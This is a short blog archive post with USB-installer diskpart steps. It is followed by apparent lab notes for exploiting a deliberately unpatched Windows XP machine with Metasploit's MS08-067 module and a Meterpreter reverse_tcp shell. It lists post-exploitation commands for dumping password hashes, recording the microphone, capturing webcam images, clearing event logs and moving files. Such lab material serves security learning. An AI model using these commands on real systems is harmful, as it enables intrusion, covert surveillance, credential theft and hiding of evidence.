Archives

All posts for the month December, 2014

Follow these steps:

  1. Insert your USB Flash Drive into an available port.
  2. Open the Command Prompt (Admin) by right-clicking on the Start button, clicking Command Prompt (Admin), and then click Yes on the UAC prompt.
  3. Type “diskpart”and press Enter.
  4. Type “list disk” to determine the disk number of your USB Flash Drive.  Type “select disk X”, where “X” is the disk number of your USB Flash Drive.
  5. Type “clean” to erase the contents of your USB Flash Drive.
  6. Type “create partition primary size =5000”. This will create a 5GB primary partition on the USB Flash Drive.  You can later create an additional partition on the USB Flash Drive for persistent storage.
  7. Type “select partition 1”.
  8. Type “active” to make the partition active
  9. Type “format fs=ntfs quick” to format the partition.
  10. Type “assign” to give the USB Flash Drive a drive letter.
  11. Copy the contents of the Windows 8.1 DVD to the USB Flash Drive.

Alternatively, you can download the Universal USB Installer from http://www.pendrivelinux.com and follow the instructions on the site.

Windows XP SP 2 Setup:

Make sure Automatic Updates are disabled, the Windows Firewall is off, and the system has been restarted at least once.

Metasploit:

use exploit/windows/smb/ms08_067_netapi

set rhost 192.168.1.45

exploit #Do not execute at this point if you want to add the payload below

? or help #see the list of available meterpreter commands

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <attacking_kali_host_ip>

set LPORT <local_port> #default port is 4444

You can verify the connection from the remote machine with the following command:

netstat -a | grep 4444 #4444 assumes default local port

Some interesting Meterpreter commands are:

hashdump #get password hashes to crack, crackstation.net
record_mic #record audio
webcam_list #list available webcams
web_snap #take a picture with the webcam
web_stream #stream video from webcam
sysinfo #get remote system information
shutdown #turn off remote computer
reboot #reboot remote computer
ps #list processes running on remote computer
kill #end process running on remote computer
execute –f <file> #start program on remote machine
clearev #clear the event log
upload #send file to remote system
download #retrieve file from remote system